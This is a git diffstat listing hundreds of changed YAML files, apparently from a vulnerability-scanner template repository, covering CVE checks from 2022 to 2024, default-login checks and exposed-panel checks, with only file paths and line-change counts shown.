http/cves/2022/CVE-2022-0870.yaml | 2 +- http/cves/2022/CVE-2022-0885.yaml | 2 +- http/cves/2022/CVE-2022-0928.yaml | 2 +- http/cves/2022/CVE-2022-0954.yaml | 2 +- http/cves/2022/CVE-2022-0963.yaml | 2 +- http/cves/2022/CVE-2022-0968.yaml | 2 +- http/cves/2022/CVE-2022-1040.yaml | 2 +- http/cves/2022/CVE-2022-1058.yaml | 2 +- http/cves/2022/CVE-2022-1162.yaml | 2 +- http/cves/2022/CVE-2022-1170.yaml | 2 +- http/cves/2022/CVE-2022-1386.yaml | 2 +- http/cves/2022/CVE-2022-1388.yaml | 2 +- http/cves/2022/CVE-2022-1439.yaml | 2 +- http/cves/2022/CVE-2022-1580.yaml | 2 +- http/cves/2022/CVE-2022-1595.yaml | 2 +- http/cves/2022/CVE-2022-1609.yaml | 2 +- http/cves/2022/CVE-2022-1713.yaml | 2 +- http/cves/2022/CVE-2022-1724.yaml | 2 +- http/cves/2022/CVE-2022-1756.yaml | 2 +- http/cves/2022/CVE-2022-1815.yaml | 2 +- http/cves/2022/CVE-2022-1883.yaml | 2 +- http/cves/2022/CVE-2022-1906.yaml | 2 +- http/cves/2022/CVE-2022-1910.yaml | 2 +- http/cves/2022/CVE-2022-1952.yaml | 2 +- http/cves/2022/CVE-2022-21371.yaml | 2 +- http/cves/2022/CVE-2022-21500.yaml | 2 +- http/cves/2022/CVE-2022-21661.yaml | 2 +- http/cves/2022/CVE-2022-2174.yaml | 2 +- http/cves/2022/CVE-2022-2185.yaml | 2 +- http/cves/2022/CVE-2022-22242.yaml | 2 +- http/cves/2022/CVE-2022-22897.yaml | 2 +- http/cves/2022/CVE-2022-2290.yaml | 2 +- http/cves/2022/CVE-2022-22954.yaml | 2 +- http/cves/2022/CVE-2022-22972.yaml | 2 +- http/cves/2022/CVE-2022-23102.yaml | 2 +- http/cves/2022/CVE-2022-23131.yaml | 2 +- http/cves/2022/CVE-2022-23134.yaml | 2 +- http/cves/2022/CVE-2022-2314.yaml | 2 +- http/cves/2022/CVE-2022-23347.yaml | 2 +- http/cves/2022/CVE-2022-23544.yaml | 2 +- http/cves/2022/CVE-2022-23779.yaml | 2 +- http/cves/2022/CVE-2022-2379.yaml | 2 +- http/cves/2022/CVE-2022-23808.yaml | 2 +- http/cves/2022/CVE-2022-2383.yaml | 2 +- http/cves/2022/CVE-2022-23854.yaml | 2 +- http/cves/2022/CVE-2022-23898.yaml | 2 +- http/cves/2022/CVE-2022-24112.yaml | 2 +- http/cves/2022/CVE-2022-24124.yaml | 2 +- http/cves/2022/CVE-2022-2414.yaml | 2 +- http/cves/2022/CVE-2022-24260.yaml | 2 +- http/cves/2022/CVE-2022-24288.yaml | 2 +- http/cves/2022/CVE-2022-2462.yaml | 2 +- http/cves/2022/CVE-2022-24627.yaml | 2 +- http/cves/2022/CVE-2022-24681.yaml | 2 +- http/cves/2022/CVE-2022-24716.yaml | 2 +- http/cves/2022/CVE-2022-24816.yaml | 2 +- http/cves/2022/CVE-2022-2487.yaml | 2 +- http/cves/2022/CVE-2022-2488.yaml | 2 +- http/cves/2022/CVE-2022-24899.yaml | 2 +- http/cves/2022/CVE-2022-24990.yaml | 2 +- http/cves/2022/CVE-2022-25125.yaml | 2 +- http/cves/2022/CVE-2022-25148.yaml | 2 +- http/cves/2022/CVE-2022-25149.yaml | 2 +- http/cves/2022/CVE-2022-2535.yaml | 2 +- http/cves/2022/CVE-2022-25356.yaml | 2 +- http/cves/2022/CVE-2022-25481.yaml | 2 +- http/cves/2022/CVE-2022-25486.yaml | 2 +- http/cves/2022/CVE-2022-2551.yaml | 2 +- http/cves/2022/CVE-2022-25568.yaml | 2 +- http/cves/2022/CVE-2022-2599.yaml | 2 +- http/cves/2022/CVE-2022-26134.yaml | 2 +- http/cves/2022/CVE-2022-26138.yaml | 2 +- http/cves/2022/CVE-2022-26148.yaml | 2 +- http/cves/2022/CVE-2022-26159.yaml | 2 +- http/cves/2022/CVE-2022-26263.yaml | 2 +- http/cves/2022/CVE-2022-2627.yaml | 2 +- http/cves/2022/CVE-2022-2633.yaml | 2 +- http/cves/2022/CVE-2022-26564.yaml | 2 +- http/cves/2022/CVE-2022-2733.yaml | 2 +- http/cves/2022/CVE-2022-2756.yaml | 2 +- http/cves/2022/CVE-2022-27593.yaml | 2 +- http/cves/2022/CVE-2022-27926.yaml | 2 +- http/cves/2022/CVE-2022-27927.yaml | 2 +- http/cves/2022/CVE-2022-27984.yaml | 2 +- http/cves/2022/CVE-2022-28219.yaml | 2 +- http/cves/2022/CVE-2022-28290.yaml | 2 +- http/cves/2022/CVE-2022-28363.yaml | 2 +- http/cves/2022/CVE-2022-28365.yaml | 2 +- http/cves/2022/CVE-2022-28923.yaml | 2 +- http/cves/2022/CVE-2022-28955.yaml | 2 +- http/cves/2022/CVE-2022-29153.yaml | 2 +- http/cves/2022/CVE-2022-29272.yaml | 2 +- http/cves/2022/CVE-2022-29298.yaml | 2 +- http/cves/2022/CVE-2022-29299.yaml | 2 +- http/cves/2022/CVE-2022-29303.yaml | 2 +- http/cves/2022/CVE-2022-29349.yaml | 2 +- http/cves/2022/CVE-2022-29548.yaml | 2 +- http/cves/2022/CVE-2022-29775.yaml | 2 +- http/cves/2022/CVE-2022-30489.yaml | 2 +- http/cves/2022/CVE-2022-30514.yaml | 2 +- http/cves/2022/CVE-2022-30525.yaml | 2 +- http/cves/2022/CVE-2022-30776.yaml | 2 +- http/cves/2022/CVE-2022-30777.yaml | 2 +- http/cves/2022/CVE-2022-31126.yaml | 2 +- http/cves/2022/CVE-2022-31268.yaml | 2 +- http/cves/2022/CVE-2022-31269.yaml | 2 +- http/cves/2022/CVE-2022-31373.yaml | 2 +- http/cves/2022/CVE-2022-3142.yaml | 2 +- http/cves/2022/CVE-2022-31499.yaml | 2 +- http/cves/2022/CVE-2022-31656.yaml | 2 +- http/cves/2022/CVE-2022-31798.yaml | 2 +- http/cves/2022/CVE-2022-31845.yaml | 2 +- http/cves/2022/CVE-2022-31846.yaml | 2 +- http/cves/2022/CVE-2022-31847.yaml | 2 +- http/cves/2022/CVE-2022-32022.yaml | 2 +- http/cves/2022/CVE-2022-32024.yaml | 2 +- http/cves/2022/CVE-2022-32025.yaml | 2 +- http/cves/2022/CVE-2022-32026.yaml | 2 +- http/cves/2022/CVE-2022-32028.yaml | 2 +- http/cves/2022/CVE-2022-32094.yaml | 2 +- http/cves/2022/CVE-2022-32195.yaml | 2 +- http/cves/2022/CVE-2022-3242.yaml | 2 +- http/cves/2022/CVE-2022-32430.yaml | 2 +- http/cves/2022/CVE-2022-32770.yaml | 2 +- http/cves/2022/CVE-2022-32771.yaml | 2 +- http/cves/2022/CVE-2022-32772.yaml | 2 +- http/cves/2022/CVE-2022-33119.yaml | 2 +- http/cves/2022/CVE-2022-33174.yaml | 2 +- http/cves/2022/CVE-2022-33891.yaml | 2 +- http/cves/2022/CVE-2022-33965.yaml | 2 +- http/cves/2022/CVE-2022-34045.yaml | 2 +- http/cves/2022/CVE-2022-34046.yaml | 2 +- http/cves/2022/CVE-2022-34047.yaml | 2 +- http/cves/2022/CVE-2022-34048.yaml | 2 +- http/cves/2022/CVE-2022-34049.yaml | 2 +- http/cves/2022/CVE-2022-34328.yaml | 2 +- http/cves/2022/CVE-2022-34534.yaml | 2 +- http/cves/2022/CVE-2022-34576.yaml | 2 +- http/cves/2022/CVE-2022-34590.yaml | 2 +- http/cves/2022/CVE-2022-34753.yaml | 2 +- http/cves/2022/CVE-2022-3506.yaml | 2 +- http/cves/2022/CVE-2022-35151.yaml | 2 +- http/cves/2022/CVE-2022-35405.yaml | 2 +- http/cves/2022/CVE-2022-35413.yaml | 2 +- http/cves/2022/CVE-2022-35493.yaml | 2 +- http/cves/2022/CVE-2022-35653.yaml | 2 +- http/cves/2022/CVE-2022-35914.yaml | 2 +- http/cves/2022/CVE-2022-36446.yaml | 2 +- http/cves/2022/CVE-2022-36537.yaml | 2 +- http/cves/2022/CVE-2022-36553.yaml | 2 +- http/cves/2022/CVE-2022-36642.yaml | 2 +- http/cves/2022/CVE-2022-36883.yaml | 2 +- http/cves/2022/CVE-2022-37042.yaml | 2 +- http/cves/2022/CVE-2022-37153.yaml | 2 +- http/cves/2022/CVE-2022-37191.yaml | 2 +- http/cves/2022/CVE-2022-3800.yaml | 2 +- http/cves/2022/CVE-2022-38131.yaml | 2 +- http/cves/2022/CVE-2022-38295.yaml | 2 +- http/cves/2022/CVE-2022-38296.yaml | 2 +- http/cves/2022/CVE-2022-38463.yaml | 2 +- http/cves/2022/CVE-2022-38467.yaml | 2 +- http/cves/2022/CVE-2022-38553.yaml | 2 +- http/cves/2022/CVE-2022-38637.yaml | 2 +- http/cves/2022/CVE-2022-38817.yaml | 2 +- http/cves/2022/CVE-2022-38870.yaml | 2 +- http/cves/2022/CVE-2022-39048.yaml | 2 +- http/cves/2022/CVE-2022-39195.yaml | 2 +- http/cves/2022/CVE-2022-3980.yaml | 2 +- http/cves/2022/CVE-2022-39952.yaml | 2 +- http/cves/2022/CVE-2022-39960.yaml | 2 +- http/cves/2022/CVE-2022-40047.yaml | 2 +- http/cves/2022/CVE-2022-40127.yaml | 2 +- http/cves/2022/CVE-2022-4049.yaml | 2 +- http/cves/2022/CVE-2022-4057.yaml | 2 +- http/cves/2022/CVE-2022-4059.yaml | 2 +- http/cves/2022/CVE-2022-40734.yaml | 2 +- http/cves/2022/CVE-2022-40879.yaml | 2 +- http/cves/2022/CVE-2022-40881.yaml | 2 +- http/cves/2022/CVE-2022-41412.yaml | 2 +- http/cves/2022/CVE-2022-41441.yaml | 2 +- http/cves/2022/CVE-2022-41473.yaml | 2 +- http/cves/2022/CVE-2022-42094.yaml | 2 +- http/cves/2022/CVE-2022-42233.yaml | 2 +- http/cves/2022/CVE-2022-42746.yaml | 2 +- http/cves/2022/CVE-2022-42747.yaml | 2 +- http/cves/2022/CVE-2022-42748.yaml | 2 +- http/cves/2022/CVE-2022-42749.yaml | 2 +- http/cves/2022/CVE-2022-4295.yaml | 2 +- http/cves/2022/CVE-2022-43014.yaml | 2 +- http/cves/2022/CVE-2022-43015.yaml | 2 +- http/cves/2022/CVE-2022-43016.yaml | 2 +- http/cves/2022/CVE-2022-43017.yaml | 2 +- http/cves/2022/CVE-2022-43018.yaml | 2 +- http/cves/2022/CVE-2022-4305.yaml | 2 +- http/cves/2022/CVE-2022-43140.yaml | 2 +- http/cves/2022/CVE-2022-43165.yaml | 2 +- http/cves/2022/CVE-2022-43166.yaml | 2 +- http/cves/2022/CVE-2022-4321.yaml | 2 +- http/cves/2022/CVE-2022-43769.yaml | 2 +- http/cves/2022/CVE-2022-44877.yaml | 2 +- http/cves/2022/CVE-2022-44944.yaml | 2 +- http/cves/2022/CVE-2022-44946.yaml | 2 +- http/cves/2022/CVE-2022-44950.yaml | 2 +- http/cves/2022/CVE-2022-45354.yaml | 2 +- http/cves/2022/CVE-2022-45365.yaml | 2 +- http/cves/2022/CVE-2022-45835.yaml | 2 +- http/cves/2022/CVE-2022-45917.yaml | 2 +- http/cves/2022/CVE-2022-45933.yaml | 2 +- http/cves/2022/CVE-2022-46071.yaml | 2 +- http/cves/2022/CVE-2022-46169.yaml | 2 +- http/cves/2022/CVE-2022-46381.yaml | 2 +- http/cves/2022/CVE-2022-46443.yaml | 2 +- http/cves/2022/CVE-2022-46888.yaml | 2 +- http/cves/2022/CVE-2022-46934.yaml | 2 +- http/cves/2022/CVE-2022-47002.yaml | 2 +- http/cves/2022/CVE-2022-47003.yaml | 2 +- http/cves/2022/CVE-2022-47501.yaml | 2 +- http/cves/2022/CVE-2022-47615.yaml | 2 +- http/cves/2022/CVE-2022-47945.yaml | 2 +- http/cves/2022/CVE-2022-47966.yaml | 2 +- http/cves/2022/CVE-2022-47986.yaml | 2 +- http/cves/2022/CVE-2022-48012.yaml | 2 +- http/cves/2022/CVE-2022-48197.yaml | 2 +- http/cves/2023/CVE-2023-0159.yaml | 2 +- http/cves/2023/CVE-2023-0297.yaml | 2 +- http/cves/2023/CVE-2023-0669.yaml | 2 +- http/cves/2023/CVE-2023-0678.yaml | 2 +- http/cves/2023/CVE-2023-0777.yaml | 2 +- http/cves/2023/CVE-2023-0947.yaml | 2 +- http/cves/2023/CVE-2023-1177.yaml | 2 +- http/cves/2023/CVE-2023-1496.yaml | 2 +- http/cves/2023/CVE-2023-1671.yaml | 2 +- http/cves/2023/CVE-2023-1698.yaml | 2 +- http/cves/2023/CVE-2023-1719.yaml | 2 +- http/cves/2023/CVE-2023-1835.yaml | 2 +- http/cves/2023/CVE-2023-1892.yaml | 2 +- http/cves/2023/CVE-2023-20073.yaml | 2 +- http/cves/2023/CVE-2023-2059.yaml | 2 +- http/cves/2023/CVE-2023-20864.yaml | 2 +- http/cves/2023/CVE-2023-20887.yaml | 2 +- http/cves/2023/CVE-2023-20888.yaml | 2 +- http/cves/2023/CVE-2023-20889.yaml | 2 +- http/cves/2023/CVE-2023-22232.yaml | 2 +- http/cves/2023/CVE-2023-2227.yaml | 2 +- http/cves/2023/CVE-2023-22463.yaml | 2 +- http/cves/2023/CVE-2023-22478.yaml | 2 +- http/cves/2023/CVE-2023-22480.yaml | 2 +- http/cves/2023/CVE-2023-22515.yaml | 2 +- http/cves/2023/CVE-2023-22518.yaml | 2 +- http/cves/2023/CVE-2023-2252.yaml | 2 +- http/cves/2023/CVE-2023-22527.yaml | 2 +- http/cves/2023/CVE-2023-22620.yaml | 2 +- http/cves/2023/CVE-2023-22897.yaml | 2 +- http/cves/2023/CVE-2023-23161.yaml | 2 +- http/cves/2023/CVE-2023-23333.yaml | 2 +- http/cves/2023/CVE-2023-2356.yaml | 2 +- http/cves/2023/CVE-2023-23752.yaml | 2 +- http/cves/2023/CVE-2023-24044.yaml | 2 +- http/cves/2023/CVE-2023-24243.yaml | 2 +- http/cves/2023/CVE-2023-24322.yaml | 2 +- http/cves/2023/CVE-2023-24488.yaml | 2 +- http/cves/2023/CVE-2023-24489.yaml | 2 +- http/cves/2023/CVE-2023-24657.yaml | 2 +- http/cves/2023/CVE-2023-24733.yaml | 2 +- http/cves/2023/CVE-2023-24735.yaml | 2 +- http/cves/2023/CVE-2023-24737.yaml | 2 +- http/cves/2023/CVE-2023-25135.yaml | 2 +- http/cves/2023/CVE-2023-25157.yaml | 2 +- http/cves/2023/CVE-2023-25194.yaml | 2 +- http/cves/2023/CVE-2023-25573.yaml | 2 +- http/cves/2023/CVE-2023-25717.yaml | 2 +- http/cves/2023/CVE-2023-26035.yaml | 2 +- http/cves/2023/CVE-2023-26067.yaml | 2 +- http/cves/2023/CVE-2023-26255.yaml | 2 +- http/cves/2023/CVE-2023-26256.yaml | 2 +- http/cves/2023/CVE-2023-26347.yaml | 2 +- http/cves/2023/CVE-2023-26360.yaml | 2 +- http/cves/2023/CVE-2023-2648.yaml | 2 +- http/cves/2023/CVE-2023-27008.yaml | 2 +- http/cves/2023/CVE-2023-27032.yaml | 2 +- http/cves/2023/CVE-2023-27159.yaml | 2 +- http/cves/2023/CVE-2023-27292.yaml | 2 +- http/cves/2023/CVE-2023-2732.yaml | 2 +- http/cves/2023/CVE-2023-27350.yaml | 2 +- http/cves/2023/CVE-2023-27372.yaml | 2 +- http/cves/2023/CVE-2023-27482.yaml | 2 +- http/cves/2023/CVE-2023-27524.yaml | 2 +- http/cves/2023/CVE-2023-2766.yaml | 2 +- http/cves/2023/CVE-2023-2780.yaml | 2 +- http/cves/2023/CVE-2023-2796.yaml | 2 +- http/cves/2023/CVE-2023-2822.yaml | 2 +- http/cves/2023/CVE-2023-2825.yaml | 2 +- http/cves/2023/CVE-2023-28343.yaml | 2 +- http/cves/2023/CVE-2023-28432.yaml | 2 +- http/cves/2023/CVE-2023-28662.yaml | 2 +- http/cves/2023/CVE-2023-29298.yaml | 2 +- http/cves/2023/CVE-2023-29300.yaml | 2 +- http/cves/2023/CVE-2023-29357.yaml | 2 +- http/cves/2023/CVE-2023-2948.yaml | 2 +- http/cves/2023/CVE-2023-29489.yaml | 2 +- http/cves/2023/CVE-2023-2949.yaml | 2 +- http/cves/2023/CVE-2023-29827.yaml | 2 +- http/cves/2023/CVE-2023-29919.yaml | 2 +- http/cves/2023/CVE-2023-29922.yaml | 2 +- http/cves/2023/CVE-2023-29923.yaml | 2 +- http/cves/2023/CVE-2023-30019.yaml | 2 +- http/cves/2023/CVE-2023-30150.yaml | 2 +- http/cves/2023/CVE-2023-30534.yaml | 2 +- http/cves/2023/CVE-2023-3077.yaml | 2 +- http/cves/2023/CVE-2023-30943.yaml | 2 +- http/cves/2023/CVE-2023-31059.yaml | 2 +- http/cves/2023/CVE-2023-31446.yaml | 2 +- http/cves/2023/CVE-2023-32077.yaml | 2 +- http/cves/2023/CVE-2023-3219.yaml | 2 +- http/cves/2023/CVE-2023-32235.yaml | 2 +- http/cves/2023/CVE-2023-32315.yaml | 2 +- http/cves/2023/CVE-2023-33629.yaml | 2 +- http/cves/2023/CVE-2023-3368.yaml | 2 +- http/cves/2023/CVE-2023-33831.yaml | 2 +- http/cves/2023/CVE-2023-34192.yaml | 2 +- http/cves/2023/CVE-2023-34537.yaml | 2 +- http/cves/2023/CVE-2023-34598.yaml | 2 +- http/cves/2023/CVE-2023-34599.yaml | 2 +- http/cves/2023/CVE-2023-34751.yaml | 2 +- http/cves/2023/CVE-2023-34752.yaml | 2 +- http/cves/2023/CVE-2023-34753.yaml | 2 +- http/cves/2023/CVE-2023-34755.yaml | 2 +- http/cves/2023/CVE-2023-34756.yaml | 2 +- http/cves/2023/CVE-2023-3479.yaml | 2 +- http/cves/2023/CVE-2023-34843.yaml | 2 +- http/cves/2023/CVE-2023-34960.yaml | 2 +- http/cves/2023/CVE-2023-34993.yaml | 2 +- http/cves/2023/CVE-2023-35078.yaml | 2 +- http/cves/2023/CVE-2023-35082.yaml | 2 +- http/cves/2023/CVE-2023-35158.yaml | 2 +- http/cves/2023/CVE-2023-35162.yaml | 2 +- http/cves/2023/CVE-2023-35813.yaml | 2 +- http/cves/2023/CVE-2023-35844.yaml | 2 +- http/cves/2023/CVE-2023-35885.yaml | 2 +- http/cves/2023/CVE-2023-36144.yaml | 2 +- http/cves/2023/CVE-2023-36284.yaml | 2 +- http/cves/2023/CVE-2023-36347.yaml | 2 +- http/cves/2023/CVE-2023-36845.yaml | 2 +- http/cves/2023/CVE-2023-37265.yaml | 2 +- http/cves/2023/CVE-2023-37266.yaml | 2 +- http/cves/2023/CVE-2023-37270.yaml | 2 +- http/cves/2023/CVE-2023-37462.yaml | 2 +- http/cves/2023/CVE-2023-37580.yaml | 2 +- http/cves/2023/CVE-2023-3765.yaml | 2 +- http/cves/2023/CVE-2023-37679.yaml | 2 +- http/cves/2023/CVE-2023-37728.yaml | 2 +- http/cves/2023/CVE-2023-38035.yaml | 2 +- http/cves/2023/CVE-2023-38203.yaml | 2 +- http/cves/2023/CVE-2023-38205.yaml | 2 +- http/cves/2023/CVE-2023-3836.yaml | 2 +- http/cves/2023/CVE-2023-38433.yaml | 2 +- http/cves/2023/CVE-2023-3844.yaml | 2 +- http/cves/2023/CVE-2023-38501.yaml | 2 +- http/cves/2023/CVE-2023-38646.yaml | 2 +- http/cves/2023/CVE-2023-38964.yaml | 2 +- http/cves/2023/CVE-2023-39002.yaml | 2 +- http/cves/2023/CVE-2023-39026.yaml | 2 +- http/cves/2023/CVE-2023-39108.yaml | 2 +- http/cves/2023/CVE-2023-39109.yaml | 2 +- http/cves/2023/CVE-2023-39110.yaml | 2 +- http/cves/2023/CVE-2023-39141.yaml | 2 +- http/cves/2023/CVE-2023-39143.yaml | 2 +- http/cves/2023/CVE-2023-39361.yaml | 2 +- http/cves/2023/CVE-2023-39598.yaml | 2 +- http/cves/2023/CVE-2023-39600.yaml | 2 +- http/cves/2023/CVE-2023-39676.yaml | 2 +- http/cves/2023/CVE-2023-39677.yaml | 2 +- http/cves/2023/CVE-2023-39700.yaml | 2 +- http/cves/2023/CVE-2023-40779.yaml | 2 +- http/cves/2023/CVE-2023-4112.yaml | 2 +- http/cves/2023/CVE-2023-4116.yaml | 2 +- http/cves/2023/CVE-2023-41265.yaml | 2 +- http/cves/2023/CVE-2023-41266.yaml | 2 +- http/cves/2023/CVE-2023-4173.yaml | 2 +- http/cves/2023/CVE-2023-4174.yaml | 2 +- http/cves/2023/CVE-2023-41763.yaml | 2 +- http/cves/2023/CVE-2023-41892.yaml | 2 +- http/cves/2023/CVE-2023-42343.yaml | 2 +- http/cves/2023/CVE-2023-42442.yaml | 2 +- http/cves/2023/CVE-2023-42793.yaml | 2 +- http/cves/2023/CVE-2023-43208.yaml | 2 +- http/cves/2023/CVE-2023-43374.yaml | 2 +- http/cves/2023/CVE-2023-43795.yaml | 2 +- http/cves/2023/CVE-2023-44352.yaml | 2 +- http/cves/2023/CVE-2023-44353.yaml | 2 +- http/cves/2023/CVE-2023-4451.yaml | 2 +- http/cves/2023/CVE-2023-44812.yaml | 2 +- http/cves/2023/CVE-2023-44813.yaml | 2 +- http/cves/2023/CVE-2023-4521.yaml | 2 +- http/cves/2023/CVE-2023-45375.yaml | 2 +- http/cves/2023/CVE-2023-4542.yaml | 2 +- http/cves/2023/CVE-2023-45671.yaml | 2 +- http/cves/2023/CVE-2023-4568.yaml | 2 +- http/cves/2023/CVE-2023-45852.yaml | 2 +- http/cves/2023/CVE-2023-45855.yaml | 2 +- http/cves/2023/CVE-2023-4596.yaml | 2 +- http/cves/2023/CVE-2023-46347.yaml | 2 +- http/cves/2023/CVE-2023-46359.yaml | 2 +- http/cves/2023/CVE-2023-46574.yaml | 2 +- http/cves/2023/CVE-2023-46747.yaml | 2 +- http/cves/2023/CVE-2023-47211.yaml | 2 +- http/cves/2023/CVE-2023-47246.yaml | 2 +- http/cves/2023/CVE-2023-47643.yaml | 2 +- http/cves/2023/CVE-2023-48023.yaml | 2 +- http/cves/2023/CVE-2023-48084.yaml | 2 +- http/cves/2023/CVE-2023-48777.yaml | 2 +- http/cves/2023/CVE-2023-49070.yaml | 2 +- http/cves/2023/CVE-2023-49103.yaml | 2 +- http/cves/2023/CVE-2023-4966.yaml | 2 +- http/cves/2023/CVE-2023-4973.yaml | 2 +- http/cves/2023/CVE-2023-4974.yaml | 2 +- http/cves/2023/CVE-2023-5003.yaml | 2 +- http/cves/2023/CVE-2023-50290.yaml | 2 +- http/cves/2023/CVE-2023-5074.yaml | 2 +- http/cves/2023/CVE-2023-5089.yaml | 2 +- http/cves/2023/CVE-2023-50917.yaml | 2 +- http/cves/2023/CVE-2023-50968.yaml | 2 +- http/cves/2023/CVE-2023-51467.yaml | 2 +- http/cves/2023/CVE-2023-52085.yaml | 2 +- http/cves/2023/CVE-2023-5244.yaml | 2 +- http/cves/2023/CVE-2023-5830.yaml | 2 +- http/cves/2023/CVE-2023-5914.yaml | 2 +- http/cves/2023/CVE-2023-5991.yaml | 2 +- http/cves/2023/CVE-2023-6018.yaml | 2 +- http/cves/2023/CVE-2023-6020.yaml | 2 +- http/cves/2023/CVE-2023-6021.yaml | 2 +- http/cves/2023/CVE-2023-6023.yaml | 2 +- http/cves/2023/CVE-2023-6038.yaml | 2 +- http/cves/2023/CVE-2023-6063.yaml | 2 +- http/cves/2023/CVE-2023-6065.yaml | 2 +- http/cves/2023/CVE-2023-6114.yaml | 2 +- http/cves/2023/CVE-2023-6360.yaml | 2 +- http/cves/2023/CVE-2023-6379.yaml | 2 +- http/cves/2023/CVE-2023-6380.yaml | 2 +- http/cves/2023/CVE-2023-6389.yaml | 2 +- http/cves/2023/CVE-2023-6553.yaml | 2 +- http/cves/2023/CVE-2023-6567.yaml | 2 +- http/cves/2023/CVE-2023-6623.yaml | 2 +- http/cves/2023/CVE-2023-6634.yaml | 2 +- http/cves/2023/CVE-2023-6831.yaml | 2 +- http/cves/2023/CVE-2023-6875.yaml | 2 +- http/cves/2023/CVE-2023-6909.yaml | 2 +- http/cves/2023/CVE-2023-6977.yaml | 2 +- http/cves/2023/CVE-2023-6989.yaml | 2 +- http/cves/2023/CVE-2023-7028.yaml | 2 +- http/cves/2024/CVE-2024-0195.yaml | 2 +- http/cves/2024/CVE-2024-0200.yaml | 2 +- http/cves/2024/CVE-2024-0204.yaml | 2 +- http/cves/2024/CVE-2024-0235.yaml | 2 +- http/cves/2024/CVE-2024-0305.yaml | 2 +- http/cves/2024/CVE-2024-0713.yaml | 2 +- http/cves/2024/CVE-2024-1021.yaml | 2 +- http/cves/2024/CVE-2024-1061.yaml | 2 +- http/cves/2024/CVE-2024-1071.yaml | 2 +- http/cves/2024/CVE-2024-1183.yaml | 2 +- http/cves/2024/CVE-2024-1208.yaml | 2 +- http/cves/2024/CVE-2024-1209.yaml | 2 +- http/cves/2024/CVE-2024-1212.yaml | 2 +- http/cves/2024/CVE-2024-1709.yaml | 2 +- http/cves/2024/CVE-2024-21644.yaml | 2 +- http/cves/2024/CVE-2024-21645.yaml | 2 +- http/cves/2024/CVE-2024-21683.yaml | 2 +- http/cves/2024/CVE-2024-21887.yaml | 2 +- http/cves/2024/CVE-2024-21893.yaml | 2 +- http/cves/2024/CVE-2024-22024.yaml | 2 +- http/cves/2024/CVE-2024-22319.yaml | 2 +- http/cves/2024/CVE-2024-22320.yaml | 2 +- http/cves/2024/CVE-2024-22927.yaml | 2 +- http/cves/2024/CVE-2024-23917.yaml | 2 +- http/cves/2024/CVE-2024-24131.yaml | 2 +- http/cves/2024/CVE-2024-25669.yaml | 2 +- http/cves/2024/CVE-2024-25735.yaml | 2 +- http/cves/2024/CVE-2024-26331.yaml | 2 +- http/cves/2024/CVE-2024-27198.yaml | 2 +- http/cves/2024/CVE-2024-27497.yaml | 2 +- http/cves/2024/CVE-2024-27564.yaml | 2 +- http/cves/2024/CVE-2024-29059.yaml | 2 +- http/cves/2024/CVE-2024-3097.yaml | 2 +- http/cves/2024/CVE-2024-31621.yaml | 2 +- http/cves/2024/CVE-2024-31848.yaml | 2 +- http/cves/2024/CVE-2024-31849.yaml | 2 +- http/cves/2024/CVE-2024-31850.yaml | 2 +- http/cves/2024/CVE-2024-31851.yaml | 2 +- http/cves/2024/CVE-2024-32640.yaml | 2 +- http/cves/2024/CVE-2024-32651.yaml | 2 +- http/cves/2024/CVE-2024-3273.yaml | 2 +- http/cves/2024/CVE-2024-33575.yaml | 2 +- http/cves/2024/CVE-2024-33724.yaml | 2 +- http/cves/2024/CVE-2024-3400.yaml | 2 +- http/cves/2024/CVE-2024-34470.yaml | 2 +- http/cves/2024/CVE-2024-3822.yaml | 2 +- http/cves/2024/CVE-2024-4040.yaml | 2 +- http/cves/2024/CVE-2024-4348.yaml | 2 +- http/cves/2024/CVE-2024-4358.yaml | 2 +- http/cves/2024/CVE-2024-4956.yaml | 2 +- http/default-logins/3com/3Com-wireless-default-login.yaml | 2 +- http/default-logins/ampjuke-default-login.yaml | 2 +- http/default-logins/asus/asus-rtn16-default-login.yaml | 2 +- http/default-logins/asus/asus-wl500g-default-login.yaml | 2 +- http/default-logins/asus/asus-wl520GU-default-login.yaml | 2 +- .../cambium-networks/cambium-networks-default-login.yaml | 2 +- http/default-logins/crushftp/crushftp-anonymous-login.yaml | 2 +- http/default-logins/crushftp/crushftp-default-login.yaml | 2 +- .../digital-watchdog/digital-watchdog-default-login.yaml | 2 +- .../next-terminal/next-terminal-default-login.yaml | 2 +- http/default-logins/pentaho/pentaho-default-login.yaml | 3 +-- http/default-logins/soplanning/soplanning-default-login.yaml | 2 +- http/default-logins/structurizr/structurizr-default-login.yaml | 3 +-- http/default-logins/timekeeper/timekeeper-default-login.yaml | 3 +-- http/default-logins/wazuh-default-login.yaml | 2 +- http/default-logins/xxljob/xxljob-default-login.yaml | 3 +-- http/default-logins/zabbix/zabbix-default-login.yaml | 2 +- http/exposed-panels/3cx-phone-management-panel.yaml | 2 +- http/exposed-panels/3cx-phone-webclient-management-panel.yaml | 2 +- http/exposed-panels/acemanager-login.yaml | 2 +- http/exposed-panels/acenet-panel.yaml | 2 +- http/exposed-panels/ackee-panel.yaml | 2 +- http/exposed-panels/acrolinx-dashboard.yaml | 2 +- http/exposed-panels/acti-panel.yaml | 2 +- http/exposed-panels/active-admin-exposure.yaml | 2 +- http/exposed-panels/activemq-panel.yaml | 2 +- http/exposed-panels/acunetix-login.yaml | 2 +- http/exposed-panels/addonfinance-portal.yaml | 2 +- http/exposed-panels/adhoc-transfer-panel.yaml | 2 +- http/exposed-panels/adiscon-loganalyzer.yaml | 2 +- http/exposed-panels/adminer-panel-detect.yaml | 2 +- http/exposed-panels/adminer-panel.yaml | 2 +- http/exposed-panels/adminset-panel.yaml | 2 +- http/exposed-panels/adobe/adobe-component-login.yaml | 2 +- http/exposed-panels/adobe/adobe-connect-central-login.yaml | 2 +- http/exposed-panels/adobe/adobe-experience-manager-login.yaml | 2 +- http/exposed-panels/adobe/aem-crx-package-manager.yaml | 2 +- http/exposed-panels/adobe/aem-sling-login.yaml | 2 +- http/exposed-panels/aircube-dashboard-panel.yaml | 2 +- http/exposed-panels/aircube-login.yaml | 2 +- http/exposed-panels/airflow-panel.yaml | 2 +- http/exposed-panels/airnotifier-panel.yaml | 2 +- http/exposed-panels/akamai-cloudtest.yaml | 2 +- http/exposed-panels/alfresco-detect.yaml | 2 +- http/exposed-panels/algonomia-panel.yaml | 2 +- http/exposed-panels/allied-telesis-exposure.yaml | 2 +- http/exposed-panels/ambari-exposure.yaml | 2 +- http/exposed-panels/amcrest-login.yaml | 2 +- http/exposed-panels/ametys-admin-login.yaml | 2 +- http/exposed-panels/amp-application-panel.yaml | 2 +- http/exposed-panels/ampache-panel.yaml | 2 +- http/exposed-panels/amprion-gridloss-panel.yaml | 2 +- 